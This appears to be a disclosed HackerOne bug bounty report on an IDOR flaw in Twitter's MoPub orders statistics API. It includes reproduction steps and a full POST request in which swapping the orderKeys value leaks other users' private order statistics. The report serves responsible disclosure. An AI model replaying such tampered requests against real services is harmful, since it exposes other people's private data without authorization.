Twitter: IDOR and statistics leakage in Orders

ID H1:544329
Type hackerone
Reporter updatelap
Modified 2019-06-14T00:08:40


Description: Twitter on its service "MoPub" statistics dedicated to the results of "Order", after the test shows that the endpoint "" is infected with a "IDOR " bug

Which led to the leak of private statistics "Orders" by another users

Steps To Reproduce:

  1. [Create account in and login]
  2. [go to the link and create Order ]
  3. [using this POST Request you can disclose statistics another orders By changing the value of the parameter orderKeys in body request]

``` POST /web-client/api/orders/stats/query HTTP/1.1 Host: User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: Content-Type: application/json x-csrftoken: {TOKEN} Content-Length: 98 Connection: close Cookie: csrftoken={TOKEN}; sessionid={SID}; mp_mixpanel__c=1;

{"startTime":"2019-04-07","endTime":"2019-04-20","orderKeys":["43b29d60a9724fa9abbdc800044002d6"]} ``` {F472873}


leakage statistics